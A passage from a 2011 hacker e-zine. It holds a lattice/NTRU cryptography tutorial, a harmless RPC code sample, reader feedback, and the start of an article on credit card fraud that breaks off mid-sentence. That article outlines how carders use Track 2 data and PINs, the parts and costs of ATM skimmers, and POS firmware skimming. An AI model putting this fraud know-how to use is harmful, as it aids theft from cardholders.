__ _,-;''';`'-,. ,yNNNNNNNNo ,mMMMMMMMMd, _/', `; `; `\ -Mm oMd `NM: , _..,-'' ' ` ` `\ :Mm mM oMN mM: | ;._.,,-' .| |,_ ,, `\ .NMmmmmmmMM 'MMmmmmmNMN' -dh dd. | `;' ;' ;, `, ; | ' ' . \ :Mm MM. *purr* `; __` ,'__ ` , ` ; | ; \ dNNNNNNNNN, MM. yM :Mm MM. ; (6_); (6_) ; | , \ ' | NM: :My MM. yM :Mm MM. ;; _,' ,. ` `, ' `-._ | MM: :MN MM. yM :Mm MM. ,;.=..`_..=.,' -' ,'' _,--'' MM: :MM mMNmmmmmMM :Mm MM. _pb__\,`"=,,,=="',___,,,-----'''----'_'_'_''-;'' -----------------------'''''''''''''' hM) /' .h+ sh :hdddddddh/ dd` :ds oddddddddy. ,ddddddd-d ,yddddddddo ,/ ,/'ddddddd` -Mm+++++++oMM mMs:::::oMm MM. /Mh MM::::::hMh Mm+````` yMh`````yMM /' /Mh```````` /sssyMMssso- mM/ oMM MM. /Mh MM :+/ 'hhhhhhdM, yMh hh__,,-' /' MMNNNNNNNN. .MM NMdyyyyydMN MMdyyyyymMh MM ,,,,,,,,MM sMN,/'_,,--''Mo My```````` `o+ `+ooooooo+` .+oooooooo: oo .oooooooo+: `/o| (ooooo /o- My `' My +: 0x01 Introduction || 0x08 MapReduce, Part 2 elchupathingy 0x02 Feedback + Edits || 0x09 Cameras + DVRs Scan storm 0x03 Lattice-Based Cryptography rattle || 0x0a 303-833-00xx Scan Shadytel, Inc 0x04 duper's Code Corner duper || 0x0b bit.ly Shenanigans Silks, elchupa 0x05 The Tech Behind Credit Cards K141 || 0x0c Programming Challenge storm 0x06 Brief Notes on Kiosk Hacking storm || 0x0d The Scoop on LIGATT 0x07 Linux Rootkit Dev Update duper || 0x0e Et Cetera, Etc. teh crew [==================================================================================================] [================================================] Go Null Yourself E-Zine Issue #4 - Spring/April 2011 www.GoNullYourself.org "It makes sense if you don't think about it" [================================================] [==================================================================================================] -=[ 0x01 Introduction Ahoy there, and welcome to issue #4 of GNY Zine - just in time for spring! The sun is shining, the birds are chirping, and with the advent of laptops, now all you little h4xx0rs have no excuse not to go outside! For those who still prefer the cool depths of a basement, though, then GNY Zine has all you need in lieu of vitamin D and a social life. Like crypto! And rootkits! And leet ASCII art! We may not have iced tea, but here's a recipe to make up for it: * 8 cups water * 3 orange pekoe tea bags * 3/4 cup SPLENDA® No Calorie Sweetener, Granulated * 1/2 cup lemon juice 1. In a large saucepan, heat water to a rapid boil. Remove from heat and drop in the tea bags. Cover and let steep for 1 hour. 2. In a large pitcher, combine the steeped tea and the SPLENDA® Granulated Sweetener. Stir until dissolved, then stir in lemon juice. Refrigerate until chilled. Hey, it got quite a few good reviews and only has 11 Calories. Anyways, don't want to keep you. Those 3100 lines below aren't gonna read themselves. Enjoy the zine, and see ya in the summer. Notable Events ============== January 2011 - Leak of LIGATT Security/Gregory D. Evans January 31, 2011 - Go Null Yourself turns 3-years-old February 3, 2011 - Exhaustion of remaining IPv4 address space February 2011 - Leak of HBGary, Inc. -=-=- Now, on to formalities... If you are interested in submitting content for future issues of GNY Zine, we would be happy to review it for publication. Content may take many forms, whether it be a paper, review, scan, or first-hand account of an event. Submissions of ASCII cover art that display the GNY logo in some way are also appreciated. Well-received topics include computer hacking and exploitation methods, programming, telephone phreaking (both analog and digital), system and network exploration, hardware hacking, reverse engineering, amateur radio, cryptography and steganography, and social engineering. We are also receptive to content relating to concrete subjects such as science and mathematics, along with more abstract subjects such as psychology and culture. Both technical and non-technical material is accepted. Submissions of content, suggestions for and criticisms of the zine, and death threats may be sent via: - IRC private message (storm, m0nkee, or Barney- @ irc.gonullyourself.org #gny) - Email (zine@gonullyourself.org) If there is enough feedback, we will publish some of the messages in future issues. Our PGP key is available for use below. We have devoted a lot of effort into this publication and hope that you learn something from reading it. Abiding by our beliefs, any information within this e-zine may be freely re-distributed, utilized, and referenced elsewhere, but we do ask that you keep the articles fully intact (unless citing certain passages) and give credit to the original authors when and where necessary. Go Null Yourself, its staff members, and the authors of GNY Zine are not responsible for any harm or damage that may result from the information presented within this publication. Although people will be people and act in idiotic fashions, we do not condone, promote, or participate in illegal behavior in any way. -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.4.11 (GNU/Linux) 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 8QJQ4gF00KrsCCSrPyg/cZ5G =g7oJ -----END PGP PUBLIC KEY BLOCK----- [==================================================================================================] -=[ 0x02 Feedback and Edits We always strive to publish accurate information in GNY Zine, but we the authors and editors are in fact human beings and are subject to making mistakes from time to time, despite our best efforts. The publication, compilation, and distribution of this e-zine is derived entirely from our passion for technology and curiosity of how things tick. GNY Zine has no commercial influences. If you find that there is an error in content that we have published, please do not hesitate to email us so that it may be announced and corrected in the next issue. Not acting like a stuck-up elitist about it will probably invoke a more positive response too. With that being said, we are also receptive to content or personal experiences relevant to information presented in past issues. If you've written some code, applied a concept in a new way, or just want to voice your opinion about a topic, send us an email! We may be contacted at: zine@gonullyourself.org (PGP key is available in the Introduction) Please note that emails we like will be published in future issues, so specify if you wish for your message to remain private or if you wish for us to redact certain personal information from it. ---------------------------------------------------------------------------------------------------- Turning Manning into the Feds turns an institution with relatively unlimited power against Manning. The techniques used by Lamo were a betrayal of trust given (arguably without having been earned) to Lamo. Lamo is a snitch by definition. The fact that he still has hosting on domains like resist.ca, is further evidence that resist.ca can not be trusted as an anarchist resource. The panel at HOPE in which Lamo was confronted framed the hacker community as one that is filled with snitches. Members of the panel told stories about how they were turned in by people they collaborated with and trusted. Behavior like this closes doors to the flow of information, welcomes the violence of authoritarian institutions, and sets the foundation for the privatization of security research. Behavior like Lamo's is in opposition to the safety and values of the hacker community, and as a result should not be allowed space. Idolizing individuals who act with such a disregard for the hacker community they claim to be a part of with a glowing expose is a disgrace to the hacker community. With disgust, evoltech >> Thanks for sending us your opinion. Though, we checked and it seems like Adrian's website is >> currently 404'ing (for those of you who didn't read the interview from issue #2, the URL is >> http://users.resist.ca/~adrian/). We actually followed up on this and contacted resist.ca about >> it, who replied: Hi there, Sorry we haven't responded to you yet about your question about Adrian Lamo's website on resist.ca. We removed his various accounts becuase his motivations seem to be in conflict with ours (see http://www.youtube.com/watch?v=ebLahUUr__s). Our project is politically motivated and we offer services to projects that share our political alignment. Adrian's activities around the wikileaks debacle suggest to us that he doesn't actually align with us politically. For more information on the kinds of political activism we support, please read our mission statement at http://resist.ca/mission and our basis of unity at http://resist.ca/basis --The resist.ca collective >> So, there you go. [==================================================================================================] -=[ 0x03 Lattice-Based Cryptography -=[ Author: rattle -=[ Website: http://www.awarenetwork.org/ p o s t - q u a n t u m ,----,----,--,--,-----.|¯¯|_.-----.-----.----.---.-.-----.|¯¯|--.--.--. | __| _| | | = || _| = | = | _| = | = || | | | |____|__| |___ | __||____|_____|___ |__| |___._| __||__|__|___ | |_____|__| |_____| |__| |_____| A Lattice-Based Crypto System rattle // born // tobi -- 0 Requirements -------------------------------------------------------------- I will expect readers to have a basic grasp of (linear) algebra. The terms I will use without further explanation are the following: - vector - linear independence - matrix - rank of a matrix - transpose of a matrix - scalar products - quotient rings Z(q) = { 0, ..., q-1 } (where all operations are performed modulo q) I also expect the reader to have a certain idea of computational complexity, if even only the roughest. You should have heard of the following notions: - Big-O notation (Landau symbols) - Time/Space complexity of an algorithm I really can not give a complete introduction to these topics here. I would recommend literature, but all the undergraduate books on these topics that I know are in German. ---- 0.1 Notation -------------------------------------------------------------- When A is some (n x m)-matrix (this means it has n rows and m columns), then the entry in the i-th row and j-th column is denoted by A[i,j]. Similarly, if a is a vector (which is just a (n x 1)-matrix), we will denote the i-th entry of this vector by a[i]. The transpose of a matrix A is denoted by A°. The canonical basis of real space will be denoted by e(1)...e(n), which are the vectors defined by e(i)[j]=1 <=> i=j and e(i)[j]=0 otherwise. We will denote the real numbers by R, the integer numbers by Z. The notation X^n is to be read as "X to the n" and denotes Cartesian powers if X is a set, otherwise it means multiplying X with itself n times, duh. In real space, if a and b are vectors, we denote by = a[1]·b[1] + ··· + a[n]·b[n] the Euclidean scalar product. -- 1 Introduction -------------------------------------------------------------- Given linearly independent vectors B[1],...,B[n] in R^n, the lattice spanned by these vectors is the set L = { a[1]·B[1] + ... + a[n]·B[n] | a in Z^n } of all integer linear combinations of them. The following is an example in R^2: Each lattice point is marked by an x and the 'grid' has been ASCII-modelled for your convenience. ^ |· · ·. · · ·. · · 7 x · x · x · | ·. · · ·. · · ·. · 6 | x · x · x | · ·. · · ·. · · · 5 | · x · x · | ·. · · ·. · · ·. · 4 | x · x · x | · ·. · · ·. · · ·. 3 | · x · x · | · · ·. · · ·. · 2 | x · x · x | · ·. · · ·. · · ·. · 1 | · x · x · x |· · ·. · · ·. · · --+---------------------------x---------------------------x-----------------> | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | Figure 1: Example of a two-dimensional Lattice Now, consider the following picture. We have added a "target" vector (marked €) and a circle around it intersecting the closest lattice point, which is p=(5,3) in this case. ^ |· · ·. · · ·. · · 7 x · x · x · | ·. · · ·. · · ·. · 6 | x · x · x | · ·. · · ·. · · · 5 | · x · x · | ·. · _·_ ·. · · ·. · 4 | x Ž · ` x · x | · ·. | · € | · ·. · · ·. 3 | · p , · x · | · · ¯ ¯ ·. · · ·. · 2 | b · x · x | · ·. · · ·. · · ·. · 1 | · a · x · c |· · ·. · · ·. · · --+---------------------------d---------------------------x-----------------> | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | Figure 2: Lattice with target vector Using the basis a=(4,1) and b=(1,2), it is easy to see that p = a + b. On the other hand, using the basis c=(18,1) and d=(7,0), the same point has the less simple description p = 3·c - 7·d. When passing to higher dimensions, this phenomenon escalates drastically. This way, we obtain a computational problem that varies from easy to virtually impossible to solve, depending very much on on the lattice basis used. ---- 1.1 Lattice Problems ------------------------------------------------------ Let L be a lattice and g some real value greater or equal to one. We denote by d(x,y) the distance from the point x to the point y. The lattice approximation problems are the following: CLOSEST VECTOR PROBLEM -- CVP(g): For any vector t in R^n, let y be the lattice point closest to t. The task is to find a lattice point x not equal to t such that d(x,t) is less or equal to g·d(y,t). In other words, x is no further from t than g times the distance from t to any lattice point. SHORTEST VECTOR PROBLEM -- SVP(g): Find a vector x such that x is no longer than g times the shortest lattice vector. This is the special case of the CVP where t=(0,...,0) is the origin. We also write SVP = SVP(1) and CVP = CVP(1) for the non-approximative problems. ---- 1.2 Lattice-based Encryption: Breakdown ----------------------------------- Based on these problems, we can build an assymetrical cryptosystem, which is roughly described as follows: a) Choose a random "good" basis and keep it as a private key. b) Hand out a "bad" basis for the same lattice as a public key. c) Somehow find a way to encode your messages as lattice points. d) Encrypt a lattice point by simply distorting it randomly by a small vector. e) Decryption now means that you have to find the lattice point closest to the distorted vector (because it was the original message). This is now equivalent to solving the CVP, which should only be possible when in possession of a "good" basis. ---- 1.3 Analysis of SVP ------------------------------------------------------- We now give a brief historical analysis of the hardness of the SVP(g) - one should note here that the CVP(g) is harder than the SVP(g), therefore it would suffice if the SVP(g) was hard to solve. And indeed, from the algorithms known so far, it seems that we can either achieve a polynomial runtime or a polynomial approximation factor, but not both: +--------+--------------+--------+-------------------------------------+ | g | Runtime | Space | Reference | +--------+--------------+--------+-------------------------------------+ | 1 | 2^O(n) | 2^O(n) | [JHLW11, Combinatorial SVP-Solver] | | 1 | 2^O(n log n) | poly | [Kan83] | | poly | 2^O(n) | 2^O(n) | [MR09] | | 2^O(n) | poly | ? | [LLL82] | +--------+--------------+--------+-------------------------------------+ This has led to the following conjecture: Conjecture 1.1. There is no polynomial time algorithm that approximates lattice problems to within polynomial factors. As far as exponential-time exact solvers are concerned, they have become practical even for small instances just in the recent years: +------+-------------------------+----------+-----------+ | Year | Authors | Time | Space | +------+-------------------------+----------+-----------+ | 2001 | Ajtai, Kumar, Sivakumar | 2^O(n) | 2^O(n) | | 2004 | Regev | 2^(16n) | 2^(8n) | | 2008 | Nguyen, Vidick | 2^(5.9n) | 2^(3n) | | 2010 | Pujol, Stelhé | 2^(2.5n) | 2^(1.2n) | +------+-------------------------+----------+-----------+ One should note, however, that lattice reduction methods such as [LLL82] seem to perform better in practice than their theoretic worst-case guarantees suggest. This is not fully explained yet, but has experimental evidence: In [GN08], different algorithms and several distributions on lattices were compared with the result that they provide an approximation ratio of roughly g=d^n where d is close to 1.012. Still, it seems that approximation rations of (1.01)^n are outside the reach of known lattice reduction algorithms. We should note that for __________ / n g > / -------- ¯\/ log(n) the SVP(g) is not NP-hard unless the polynomial time hierarchy collapses (you should read this as "is not NP-hard"). However, it was shown in [Ajt98] that the SVP=SVP(1) actually is NP-hard. Furthermore, there are no quantum algorithms known that perform better than the classical ones. Because of this, lattice- based cryptography is often labelled "post-quantum" cryptography. In summary, we may very well assume that the SVP is a hard problem. -- 2 NTRU ---------------------------------------------------------------------- We will now present a practical implementation of the rough idea presented in subsection 1.2. For the mathematically inclined, a detailed explanation of why the encryption scheme really works the way we outlined in 1.2 can be found in [JHLW11]. ---- 2.1 Mathematical Necessities ---------------------------------------------- We first require a couple of mathematical definitions and results, since NTRU operates on a very special kind of lattices. Definition 2.1. Let Z(q) = {0,...,q-1} be the integer numbers from 0 to q-1, with all operations performed modulo q. We denote by p: Z --> Z(q) the map that sends any number n to (n mod q). When A is a matrix with integer entries, we denote by p(A) the matrix with entries in Z(q) which is obtained by reducing all entries modulo q. Definition 2.2. Let v in R^n be a vector an A an (n x n)-matrix. We then define the matrix / \ | v[0] (A·v)[0] ··· (A^(n-1)·v)[0] | | · · · | (A*v) := | · · · | | · · · | | v[n] (A·v)[n] ··· (A^(n-1)·v)[n] | \ / whose i-th column is the result of applying A exactly (i-1) times to v. We also define the special (n x n)-matrix / | \ | 0 · · · 0 | 1 | | ---------------+--- | | 1 0 · · 0 | 0 | T := | 0 · · | · | | · · · | · | | · · 0 | · | | 0 · · 0 1 | 0 | \ | / and will make frequent use of the matrix (T*v), which is the matrix whose i-th column is just v, rotated by i. Lemma 2.3. For any two vectors f and g, 1) (T*f)·g = (T*g)·f 2) T·(T*f) = (T*f)·T 3) (T*f)·(T*g) = (T*((T*f)·g)) Proof. Consider the (k x k)-matrices / \ | 0 · · 0 1 | | · · 0 | I(k) := | · · · | | 0 · · | | 1 0 · · 0 | \ / and the symmetrical (n x n)-matrices / | \ | I(k) | 0 | S(k) := | ------+-------- | | 0 | I(n-k) | \ | / Then, we have / \ / \ / \ | g[1] g[n] ·· g[2] | | | | | | g[2] g[1] ·· g[3] | | | | | (T*g)·f = | · · · | · f = | · | = | · | =: h | · · · | | · | | · | | g[n] g[n-1] ·· g[1] | | | | | \ / \ / \ / And clearly, (T*f)·g = h. This proves part (1) already. For the second state- ment, we calculate (all index operations are performed modulo n): __ n = > (S(i-1)·f)[k] · ((T^j)·g)[k] ¯¯ k=1 __ i-1 __ n = > f[i-k]·g[k-j] + > f[n+i-k]·g[k-j] ¯¯ k=1 ¯¯ k=i __ i __ n+1 = > f[i-k+1]·g[k-j-1] + > f[n+i-k+1]·g[k-j-1] ¯¯ k=2 ¯¯ k=i+1 __ i __ n = > f[i-k+1]·g[k-j-1] + > f[n+i-k+1]·g[k-j-1] ¯¯ k=1 ¯¯ k=i+1 = which yields / \ / \ / \ | | | | | | | | | | | | T · | · | = | · | = | · | | · | | · | | · | | | | | | | \ / \ / \ / and therefore, / \ | | T^(j-1) · h = (T*h)_j = | ... |. | | \ / With this, it is now obvious that / \ / \ | f[1] f[n] · · f[2] | | g[1] g[n] · · g[2] | | f[2] f[1] · · f[3] | | g[2] g[1] · · g[3] | (T*f)·(T*g) = | · · · | · | · · · | = (T*h). | · · · | | · · · | | f[n] f[n-1] · · f[1] | | g[n] g[n-1] · · g[1] | \ / \ / q.e.d. Definition 2.4. Let n and d be positive integer numbers and d < n. A vector f in Z^n is called a d-vector if it has exactly d negative and d+1 positive entries. ---- 2.2 The NTRU Cryptosystem ------------------------------------------------- We can now describe the process of key generation for the NTRU cryptosystem: ________________________________________________________________________________ Algorithm 1: NTRU-KEY-GENERATION ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Input: A prime number n, a "modulus" q, a "weight bound" d and an integer p ( (T*f)[i,j]·m[j] + (T*g)[i,j]·r[j] ) ¯¯ j=1 __ n = > ( (T^(j-1)·f)[i]·m[j] + (T^(j-1)·g)[i]·r[j] ) ¯¯ j=1 __ n = > ( f[i-j+1]·m[j] + g[i-j+1]·r[j] ) ¯¯ j=1 We write f' := f - e(1), which is the vector chosen in step 1 of the NTRU-KEY-GENERATION algorithm. Estimating the absolute value of v[i], it is maximized for f'[i-j+1] = -p if m[j] = -1 and g[i-j+1] = -p if r[j] = -1 p if m[j] = 1 p if r[j] = 1 Since f=f'+e(1), we get |v[i]| <= (2d+1)·p + (2d+1)·p + 1 = 4dp + 2p + 1, yielding (#), if we want the absolute values of v to be bounded by q/2; q.e.d. -- 3 Further Reading ----------------------------------------------------------- If you would like to read the fullblown math article, it is reference [JHLW11] and the URL to the PDF is given below. ---- 3.1 References ------------------------------------------------------------ [LLL82] A.K. Lenstra, H.W. Lenstra, and L. Lovasz, Factoring polynomials with rational coefficients, Math. Ann. 261 (1982), 515-534. [Kan83] Ravi Kannan, improved algorithms for integer programming and related lattice problems, In Proc. 15th ACM Symp. on Theory of Computing (STOC)(1983), 193-206. [Ajt98] M. Ajtai, The shortest vector problem in L2 is NP-hard for randomized reduc-tions, Proc. of 30th STOC. ACM (1998), 10-19. [GN08] N.Gama and P.Q.Nguyen, Predicting lattic reduction, Advances in Cryptology, Proc. Eurocrypt '08, Lecture Notes in Computer Science, Springer 2008 [MR09] D.J. Bernstein, J. Buchmann and E. Dahmen, Post Quantum Cryptography, chapter Lattice-based Cryptography by Daniele Micciancio and Oded Regev, 147-191, Springer 2009. [JHLW11] Jesko Huettenhain, Lars A. Wallenborn, Lattice-Based Methods, Seminar Topics in Post-Quantum Cryptography (2011), http://www.uni-bonn.de/~rattle/works/lattices.pdf -----------------------------------------------------------------------[ eof ]-- [==================================================================================================] -=[ 0x04 duper's Code Corner -=[ Author: duper -=[ Website: http://projects.ext.haxnet.org/~super/ o o o | | | o-O o o o-o o-o o-o o-o o-o o-o o-O o-o o-o o-o o-o o-o o-o o-o | | | | | | |-' | \ | | | | | |-' | | | | | | |-' | o-o o--o O-o o-o o o-o o-o o-o o-o o-o o-o o-o o o o o-o o | o /** * Code for creating the client and server sides of a Transport * Independent Remote Procedure Call "Hello World" in Linux * * i.e. not based on the SunRPC code of glibc * * Super-user access is not required, only a running portmapper. */ #include #include #include #include /** * gcc -o create-tcp-rpc-client create-tcp-rpc-client.c -ltirpc */ void vexit(const char *funcname) { perror(funcname); exit(EXIT_FAILURE); } void dispatch(struct svc_req *request, SVCXPRT *xprt) { FILE *afile = fopen("/tmp/a.txt", "a"); if(!afile) vexit("fopen"); fputs("Hello World!\n", afile); fclose(afile); return; } int main(void) { SVCXPRT* svcxprt = svctcp_create(RPC_ANYSOCK, 0, 0); if(!svcxprt) vexit("svctcp_create"); printf("xp_sock: %d\n", svcxprt->xp_sock); printf("xp_port: %d\n", svcxprt->xp_port); if(svc_register(svcxprt, 101337, 1, dispatch, IPPROTO_TCP) != 1) vexit("svc_register"); svc_run(); exit(EXIT_SUCCESS); } #include #include #include #include /** * gcc -o create-tcp-rpc-client create-tcp-rpc-client.c -ltirpc */ void clnt_vexit(enum clnt_stat value) { clnt_perrno(value); exit(EXIT_FAILURE); } void vexit(const char *funcname) { perror(funcname); exit(EXIT_FAILURE); } int main(void) { char *in = "", *out = ""; enum clnt_stat s = rpc_call("192.168.1.113", 101337, 1, 1, xdr_int, in, xdr_int, out, "tcp"); if(s != RPC_SUCCESS) clnt_vexit(s); exit(EXIT_SUCCESS); } [==================================================================================================] -=[ 0x05 The Tech Behind Credit Card Fraud -=[ Author: K141 [[ Introduction ]] --------------- Plastics carding is by far the most profitable type of credit card fraud - the replication, or spoofing, of magnetic stripe data to a secondary suitable medium host (magstripe card) being the most common form. I have written this paper to address the followed criminal procedures while explaining these steps as basically as possible. There are numerous papers and articles released that do not even touch the issues at hand; how these criminals obtain this information and more generally, who does what in the spectrum of physical carding. While 'physical carding' or plastics carding is dwarfed by the volume of virtual/online carding done, it still stands as a major contender. Technologies exist which could eradicate this type of attack; however, we see no intention of this from the banks as it involves critical changes in the current infrastructure. To date, I see no tech-related reason why this form of fraud is still allowed to be committed. [[ Track Data ]] ------------ Within a credit card (high-coercive magnetic stripe card), there exists 3 tracks of data (3 sections that are capable of storing data separately). This paper will cover the logical side of magstripe encoding (all 3 tracks and relevant data) and not the physical, that is, the widths of each track, polarities and coercivity. After reading, you should be more familiar with the processes involved in how criminals obtain and handle this data to produce profits. The majority of the time, Track 1 data is not needed for cashing out with plastics. This is the information that will be shown on the receipt and/or POS (point-of-sale) terminal. There exist some terminals, though, that require Track 1 to be present, and a good attacker (or 'carder') will always fill their Track 1 field. Luckily for the attacker, Track 1s can be generated entirely based on Track 2 data. It is important to mention that Track 1 is derived from the information on Track 2 and is often used as a fail-safe if Track 2 is or can not be read. This is also the only track that accepts alphanumeric characters. Track 2 data is the most important for 'cashing out'. This is where the relevant information for generating Track 1 data is held, as well as other data that allows a transaction to occur. Track 3 data, mostly, is null. Before a transaction may occur, a PIN is necessary for authentication. With that said, generally speaking, Track 2 data + PIN = the ability to cash out with that card. [[ Obtaining Track Data ]] ----------------------- On many hacking/carding forums, there exist endless advertisements of "Dumps + PINs for sale". These sellers, the majority of the time, are fraudulent (oh, irony) and will request a large 'minimum amount' in order to successfully defraud at least $300 or so to make the scam worth their while. If a seller is genuine and is selling Track 2 data + PINs (a rarity, but it does occur), he/she knows the balance of the said account and knows this to be low. There do exist some legitimate sellers; however, the data they sell is typically Track 2 only and can only be cashed out by the minority of the carding community. That being said, online vendors are not the only source of 'dumps'. An assailant may obtain Track 2 data with PINs by either building or buying their own card skimmer. [[ ATM Skimming ]] -------------- A 'skimmer' device is typically placed over the mouth of a genuine ATM in order to steal track data before the card is legitimately read by the machine. As the victim's credit card is entered into the ATM, it passes through the false fascia (the skimming device) and the Track 2 section passes over the Track 2 read head, stealing the information. As it only passes over the read head, this card is still able to enter the ATM machine and offer the same functionality as an un-tampered ATM. If the skimming device is coupled with a miniature camera, it will take this Track 2 data, parse it into a file on its storage medium, and also timestamp this data for later reference to the timestamped video footage of pin entry. These skimmers must then be collected from the ATM after the attack is complete (usually during early hours in the morning to avoid detection, or when the battery has run low). If the skimming device is coupled with a pin-pad overlay, it will transmit Track 2 data and PIN via SMS or Bluetooth to the attacker's phone, reducing the risk of the attacker being caught and concurrently allowing remote operation. These skimmers will only need to be re-visited when the battery runs low. An ATM skimming device is comprised of a few components: - Fascia: To overlay the ATM mouth without suspicion. - T2 Read Head: A small device to read the Track 2 data from the magnetic stripe card. Note, ideally a skimmer will read only one track of information, as to keep the size of the device minimal. - Custom printed PCB: This parses the data taken from the Track 2 head and stores it to addressed memory locations, usually a Micro-SD card or to the Bluetooth module. - Bluetooth module (optional): A Bluetooth or SMS module is often used for remotely transmitting Track 2 data, along with PINs back to the carder. - Battery: To power the device. The components required to build these devices are inexpensive, but the main obstacle towards the building of a skimmer is technical know-how. I have found the price of pre-built skimmers currently to range from $600-$8000, as opposed to $100-700 in building costs. [[ POS Skimming ]] -------------- Point of sale skimming is a software-based attack in which the firmware of the POS terminal is flashed, rather than a physical device inserted. Common models are the VeriFone Vx510 and various other Ingenico devices. These skimmers are mostly 'offline' skimmers, in which the target will believe he/she is making a purchase with their card, and a transaction will appear to process along with a receipt print, but no charge will actually occur. Instead, the card has just been swiped and the target has entered their PIN. A flashed firmware can be programmed to output a later receipt with all three track details, as well as PIN, or designed to save to file for later use. These skimmers are usually deployed in stores with the store owner's knowledge, as he/she may be forcibly issued to comply or offered a percentage of all money made. An 